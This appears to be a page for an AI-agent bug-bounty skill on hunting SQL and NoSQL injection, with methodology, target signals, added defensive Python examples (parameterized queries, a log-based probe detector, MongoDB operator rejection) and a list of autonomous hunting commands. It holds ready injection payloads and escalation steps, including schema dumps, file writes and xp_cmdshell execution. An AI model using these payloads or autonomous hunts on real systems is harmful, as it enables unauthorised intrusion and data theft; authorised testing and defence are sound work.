# hunt-sqli
The hunt-sqli skill identifies SQL and NoSQL injection vulnerabilities across modern application architectures, including MongoDB $regex operators, Django ORM raw fragments, Sequelize vulnerabilities, second-order SOQL injection, and time-based blind SQLi in GraphQL resolvers. Use this skill when systematically testing SaaS platforms, e-commerce systems, search endpoints, analytics infrastructure, third-party plugins, and internal tools exposed externally for injection flaws that could expose sensitive data at scale.
```shell
git clone --depth 1 https://github.com/elementalsouls/Claude-BugHunter /tmp/hunt-sqli && cp -r /tmp/hunt-sqli/skills/hunt-sqli ~/.claude/skills/hunt-sqli
```

**SKILL.md**
## Crown Jewel Targets
SQL injection remains one of the highest-paying vulnerability classes in bug bounty because it directly threatens data confidentiality, integrity, and availability at scale.
**Highest-value targets:**
- **SaaS platforms with multi-tenant databases** — one injection can expose all customer data
- **E-commerce/payment systems** — PII, card data, transaction records
- **Search endpoints** — user-controlled input passed directly to queries (e.g., Rockstar Games `/search`)
- **Analytics/tracking subdomains** — often built fast, tested less (e.g., `sctrack.email.uber.com.cn`)
- **Third-party plugins on enterprise installs** — WordPress plugins, CMS extensions running on corporate domains (Uber's Huge IT Video Gallery)
- **Internal tooling exposed externally** — Apache Airflow, GitHub Enterprise, admin dashboards
- **NoSQL backends (MongoDB)** — often overlooked, same injection class, different syntax
**Asset types that pay most:**
- Production APIs with `/search`, `/filter`, `/sort`, `/report` parameters
- Subdomains with legacy stacks (`.cn`, `.co`, `.io` regional variants)
- Self-hosted open-source tools (Airflow, GitLab, Jenkins) on bounty scope
- Email tracking and analytics infrastructure
---
## Attack Surface Signals
**URL patterns that suggest injectable parameters:**
```
/search?q=
/filter?category=
/sort?by=&order=
/report?start_date=&end_date=
/api/v1/items?id=
/index.php?id=
/gallery?album_id=
/track?uid=&campaign=
?page=&limit=&offset=
```
**Response header signals:**
- `X-Powered-By: PHP` — likely MySQL/PostgreSQL backend
- `Server: Apache` + PHP — classic LAMP stack
- `X-Powered-By: Express` — possible MongoDB/NoSQL backend
- Database error messages leaking in responses (MySQL, PostgreSQL, MSSQL error strings)
**JavaScript patterns indicating dynamic query construction:**
```javascript
// Look for these in JS bundles
fetch(`/api/search?q=${userInput}`)
$.ajax({ url: '/filter?sort=' + param })
axios.get('/report?from=' + startDate + '&to=' + endDate)
```
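The client-side patterns above matter because the same concatenation usually continues on the server. As an added example that is not part of the hunt-sqli skill, the following Python snippet (built-in `sqlite3`, constructed product rows) puts a string-formatted search query beside its parameterized form so the three signals from the methodology, a database error on a bare quote, a changed result set on a boolean payload, and no change at all once the input is bound as a value, can be reproduced offline:

```python
# Added example (not from the hunt-sqli skill): server-side counterpart of the
# client-side concatenation patterns. Schema and rows are constructed sample data.
import sqlite3


def make_db() -> sqlite3.Connection:
    """In-memory products table with constructed rows; one row is unpublished."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE products (id INTEGER, name TEXT, published INTEGER)")
    conn.executemany(
        "INSERT INTO products VALUES (?, ?, ?)",
        [(1, "keyboard", 1), (2, "mouse", 1), (3, "unreleased-widget", 0)],
    )
    return conn


def search_vulnerable(conn: sqlite3.Connection, q: str) -> list[str]:
    """String-formatted query: the user's input becomes part of the SQL text,
    so a quote in q changes the statement's structure."""
    sql = f"SELECT name FROM products WHERE published = 1 AND name LIKE '%{q}%'"
    return [row[0] for row in conn.execute(sql)]


def search_safe(conn: sqlite3.Connection, q: str) -> list[str]:
    """Parameterized query: the driver binds q as a single literal value, so
    quotes, comment markers and OR clauses inside it are just pattern text."""
    sql = "SELECT name FROM products WHERE published = 1 AND name LIKE ?"
    return [row[0] for row in conn.execute(sql, (f"%{q}%",))]


def leaks_db_error(search_fn, conn: sqlite3.Connection, q: str) -> bool:
    """True when the search raises a database error for input q: the
    error-based probe signal a tester looks for, seen from the server side."""
    try:
        search_fn(conn, q)
        return False
    except sqlite3.Error:
        return True


if __name__ == "__main__":
    db = make_db()
    print(search_vulnerable(db, "mouse"), search_safe(db, "mouse"))
    print(leaks_db_error(search_vulnerable, db, "'"), leaks_db_error(search_safe, db, "'"))
```

The parameterized version also keeps the `published = 1` restriction intact: the boolean payload that pulls the unpublished row out of `search_vulnerable` returns nothing from `search_safe`, which is the behaviour a fix should be checked against during retesting.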
**Tech stack signals:**
- WordPress sites with third-party plugins (check `/wp-content/plugins/`)
- Apache Airflow endpoints (`/admin/`, `/api/experimental/`)
- GitHub Enterprise (`/_graphql`, `/search`, `/api/v3/`)
- Node.js + MongoDB combinations (check for `$where`, `$regex` in request bodies)
- PHP applications returning verbose MySQL errors
**Content-type signals for NoSQL:**
- `Content-Type: application/json` bodies with nested object parameters
- Parameters accepting arrays: `param[]=value` or `{"key": {"$gt": ""}}`
---
## Step-by-Step Hunting Methodology
1. **Enumerate all input vectors** — Use Burp Suite passive scan during normal app usage. Capture every parameter: GET, POST, JSON body, HTTP headers (User-Agent, Referer, X-Forwarded-For), cookies, path segments.
2. **Identify the tech stack** — Check response headers, error messages, job postings, Wappalyzer, BuiltWith. Determines which payloads to prioritize (MySQL vs PostgreSQL vs MongoDB).
3. **Baseline the response** — Note normal response length, status code, and response time for a clean request. This is your diff baseline.
4. **Send error-based probes** — Inject single quote `'`, double quote `"`, backtick `` ` ``, and observe for:
- Database error messages (immediate confirmation)
- Response length change
- HTTP 500 errors
5. **Test boolean-based blind** — Send true/false conditions and compare responses:
- `param=1 AND 1=1` vs `param=1 AND 1=2`
- If responses differ → likely injectable
6. **Test time-based blind** — When no visible difference exists:
- MySQL: `param=1 AND SLEEP(5)`
- PostgreSQL: `param=1; SELECT pg_sleep(5)--`
- MSSQL: `param=1; WAITFOR DELAY '0:0:5'--`
- A response delayed by more than 5 seconds relative to the baseline confirms the injection
7. **For NoSQL (MongoDB)** — Test object injection via JSON body and PHP-style array params:
- Replace string value with `{"$gt": ""}` in JSON
- Try `param[$ne]=invalid` in query strings
8. **Automate confirmation** — Run `sqlmap` on confirmed candidates with `--level=3 --risk=2` to enumerate databases without manual effort.
9. **Escalate impact** — Attempt:
- `UNION`-based extraction (enumerate columns first)
- `INFORMATION_SCHEMA` dump
- File read/write (`LOAD_FILE`, `INTO OUTFILE`) if permissions allow
- Stacked queries for RCE (MSSQL `xp_cmdshell`)
10. **Document the full chain** — Capture Burp repeater request/response, sqlmap output, and proof of data extraction (non-sensitive fields only for report).
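Each step of the methodology above leaves a trace in the target's own logs, and the same strings and timing deltas the tester looks for are what a defender should alert on. As an added example that is not part of the hunt-sqli skill, this Python scanner runs over constructed access-log lines (combined-log style with an assumed trailing request time in milliseconds; adjust `LOG_RE` to the real log format) and tags the probe classes from steps 4 to 7, marking a time-based payload as a confirmed delay only when the request also exceeded the page's 5-second threshold:

```python
# Added example (not from the hunt-sqli skill): detection logic for the probe
# classes the methodology describes, run over constructed log lines.
import re
from urllib.parse import unquote_plus

# Assumed format: common log fields, then status, bytes, and request time in ms.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>\S+) (?P<url>\S+) \S+" '
    r'(?P<status>\d{3}) (?P<bytes>\S+) (?P<ms>\d+)$'
)

# One regex per probe class named in the methodology; matched on the decoded URL.
SIGNATURES = {
    "quote-probe": re.compile(r"""['"`]\s*(or|and)\b|'\s*--|'\s*#""", re.I),
    "time-based": re.compile(r"\b(sleep|pg_sleep|benchmark)\s*\(|waitfor\s+delay", re.I),
    "union-based": re.compile(r"\bunion\b.{0,20}\bselect\b|information_schema", re.I),
    "stacked/rce": re.compile(r";\s*(exec|declare|drop|waitfor)\b|xp_cmdshell", re.I),
    "nosql-operator": re.compile(r"\$(gt|ne|regex|where|lt|in|nin)\b|\[\$", re.I),
}

SLOW_MS = 5000  # the 5-second delay used by the time-based probes


def parse_line(line: str):
    """Split one log line into fields; returns None for lines in another format."""
    m = LOG_RE.match(line)
    if not m:
        return None
    entry = m.groupdict()
    entry["status"] = int(entry["status"])
    entry["ms"] = int(entry["ms"])
    entry["decoded"] = unquote_plus(entry["url"])  # probes usually arrive URL-encoded
    return entry


def classify(entry: dict) -> list[str]:
    """Tag an entry with every probe class it matches, plus two contextual tags:
    a time-based payload that really was slow, and a 500 following a quote."""
    tags = [name for name, rx in SIGNATURES.items() if rx.search(entry["decoded"])]
    if "time-based" in tags and entry["ms"] >= SLOW_MS:
        tags.append("confirmed-delay")
    if entry["status"] == 500 and re.search(r"""['"`]""", entry["decoded"]):
        tags.append("error-after-quote")
    return tags


def scan(lines) -> list[tuple[str, str, list[str]]]:
    """Return (ip, decoded url, tags) for every line that triggers at least one tag."""
    findings = []
    for line in lines:
        entry = parse_line(line)
        if entry is None:
            continue
        tags = classify(entry)
        if tags:
            findings.append((entry["ip"], entry["decoded"], tags))
    return findings


# Constructed sample log: a normal search, the probe sequence, and a slow but
# legitimate report request that must not be flagged on timing alone.
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Mar/2024:10:00:01 +0000] "GET /search?q=keyboard HTTP/1.1" 200 1532 41',
    '203.0.113.5 - - [10/Mar/2024:10:00:02 +0000] "GET /search?q=keyboard%27 HTTP/1.1" 500 0 38',
    '203.0.113.5 - - [10/Mar/2024:10:00:03 +0000] "GET /search?q=keyboard%27+AND+SLEEP(5)-- HTTP/1.1" 200 1532 5044',
    '203.0.113.5 - - [10/Mar/2024:10:00:04 +0000] "GET /api/items?id=1+UNION+SELECT+NULL,NULL HTTP/1.1" 200 9 40',
    '203.0.113.5 - - [10/Mar/2024:10:00:05 +0000] "GET /login?username[$ne]=invalid&password[$ne]=invalid HTTP/1.1" 302 0 20',
    '198.51.100.7 - - [10/Mar/2024:10:00:06 +0000] "GET /report?start_date=2024-01-01&end_date=2024-03-01 HTTP/1.1" 200 50312 6120',
]

if __name__ == "__main__":
    for ip, url, tags in scan(SAMPLE_LOG):
        print(ip, url, tags)
```

The slow `/report` request is deliberately left untagged: a long response time is only evidence when it co-occurs with a delay payload, otherwise reporting endpoints would page the on-call engineer all day. Because the sample is URL-based, POST bodies (the JSON shapes in the NoSQL section) need the body logged or inspected at the application layer to be caught the same way.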
---
## Payload & Detection Patterns
**Initial Error-Based Probes:**
```sql
'
''
`
')
"))
' OR '1'='1
' OR 1=1--
" OR 1=1--
' OR 1=1#
admin'--
```
**Boolean-Based Blind:**
```sql
' AND 1=1-- (true condition)
' AND 1=2-- (false condition)
' AND SUBSTRING(version(),1,1)='5'--
1 AND (SELECT COUNT(*) FROM users) > 0--
```
**Time-Based Blind:**
```sql
-- MySQL
' AND SLEEP(5)--
1; SELECT SLEEP(5)--
-- PostgreSQL
'; SELECT pg_sleep(5)--
1 AND (SELECT 1 FROM pg_sleep(5))--
-- MSSQL
'; WAITFOR DELAY '0:0:5'--
1; EXEC xp_cmdshell('ping -n 5 127.0.0.1')--
-- SQLite
' AND (SELECT LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(300000000/2)))))==1--
```
**UNION-Based (enumerate columns first):**
```sql
' ORDER BY 1--
' ORDER BY 2--
' ORDER BY 10-- (find column count via error)
' UNION SELECT NULL--
' UNION SELECT NULL,NULL--
' UNION SELECT NULL,NULL,NULL--
' UNION SELECT 1,database(),3--
' UNION SELECT 1,group_concat(table_name),3 FROM information_schema.tables WHERE table_schema=database()--
```
**NoSQL Injection (MongoDB):**
```javascript
// JSON body injection
{"username": {"$gt": ""}, "password": {"$gt": ""}}
{"username": {"$regex": ".*"}, "password": {"$regex": ".*"}}
{"$where": "this.username == this.password"}
// Query string injection
username[$ne]=invalid&password[$ne]=invalid
username[$regex]=.*&password[$regex]=.*
```
**PHP Hash/Array Injection:**
```
# Replace scalar with array
param[key]=value
param[$gt]=0
param[$ne]=null
```
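Both the JSON-body and the PHP-style bracket forms above reach MongoDB as the same thing: a query object in which a user-controlled key begins with `$`. As an added example that is not part of the hunt-sqli skill (and serving the NoSQL content-type signals earlier on the page as well), the following Python code shows how `username[$ne]=invalid` turns into a nested operator after bracket expansion, and a server-side check that refuses operator keys and non-string credentials before anything is handed to a query; the query-string parser and sample inputs are constructed for the illustration:

```python
# Added example (not from the hunt-sqli skill): bracket-parameter expansion and
# an operator-rejection check for MongoDB query objects. Inputs are constructed.
import re
from urllib.parse import parse_qsl

BRACKET = re.compile(r"^([^\[\]]+)\[([^\[\]]*)\]$")


def parse_bracket_query(qs: str) -> dict:
    """Expand 'a[b]=c' into {'a': {'b': 'c'}}, mimicking PHP and qs-style
    parsers; this is why a query string can carry a MongoDB operator."""
    out: dict = {}
    for key, value in parse_qsl(qs, keep_blank_values=True):
        m = BRACKET.match(key)
        if m:
            name, sub = m.group(1), m.group(2)
            if not isinstance(out.get(name), dict):
                out[name] = {}
            out[name][sub] = value
        else:
            out[key] = value
    return out


class OperatorInjection(ValueError):
    """Raised when user input would act as a query operator instead of a value."""


def reject_operators(value, path: str = "body"):
    """Recursively refuse any dict key starting with '$', at any depth, in
    dicts and lists. Returns the value unchanged when it is clean."""
    if isinstance(value, dict):
        for k, v in value.items():
            if isinstance(k, str) and k.startswith("$"):
                raise OperatorInjection(f"operator key {k!r} at {path}")
            reject_operators(v, f"{path}.{k}")
    elif isinstance(value, list):
        for i, v in enumerate(value):
            reject_operators(v, f"{path}[{i}]")
    return value


def login_lookup(body: dict) -> tuple[dict, str]:
    """Return the find() filter for a login plus the password to verify against
    the stored hash after the lookup. Credentials must be plain strings, so
    {"$gt": ""} and friends never become part of the filter."""
    reject_operators(body)
    user, pw = body.get("username"), body.get("password")
    if not isinstance(user, str) or not isinstance(pw, str):
        raise OperatorInjection("username and password must be strings")
    return {"username": user}, pw


if __name__ == "__main__":
    print(parse_bracket_query("username[$ne]=invalid&password[$ne]=invalid"))
    print(login_lookup({"username": "alice", "password": "s3cret"}))
```

The type check matters as much as the `$` scan: an array or object where a string is expected is the signal the NoSQL content-type section describes, and rejecting it at the boundary means a framework's own bracket or JSON parsing cannot smuggle operators past the handler. Libraries such as Express's `mongo-sanitize`-style middleware do the `$`-stripping part; keeping an explicit type check in the handler is still worthwhile.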
**Grep patterns f**

Other commands in the Claude-BugHunter repository:
- Run autonomous hunt loop on a target — scope check → recon → rank surface → hunt → validate → report with configurable checkpoints. Usage: `/autopilot target.com [--paranoid|--normal|--yolo]`
- Build an exploit chain — given bug A, finds B and C to combine for higher severity and payout. Knows common chain patterns: IDOR→ATO, SSRF→cloud metadata, XSS→ATO, open redirect→OAuth theft, S3→bundle→secret→OAuth. Usage: `/chain`
- Active vulnerability hunting. Two-track dispatcher — asks Red Team vs WAPT, hands off to hunt-dispatch skill and sibling commands. Usage: `/hunt target.com | /hunt *.target.com | /hunt targets.txt [--vuln-class X] [--source-code P] [--chrome]`
- On-demand intelligence fetch for a target — CVEs, disclosed reports, new features. Wraps learn.py + hunt memory context. Usage: `/intel target.com`
- Inspect or rotate hunt-memory JSONL files (audit.jsonl, patterns.jsonl, journal.jsonl). Caps file size and keeps N rotated backups so memory does not grow unbounded.
- Pick up a previous hunt on a target — shows hunt history, untested endpoints, and memory-informed suggestions. Usage: `/pickup target.com`
- Run full recon pipeline on a target — subdomain enum (Chaos API + subfinder), live host discovery (dnsx + httpx), URL crawl (katana + waybackurls + gau), gf pattern classification, nuclei scan. Outputs to `recon/<target>/` directory. Usage: `/recon target.com`
- Log current finding or successful pattern to hunt memory. Auto-fills from `/validate` output if available. Usage: `/remember`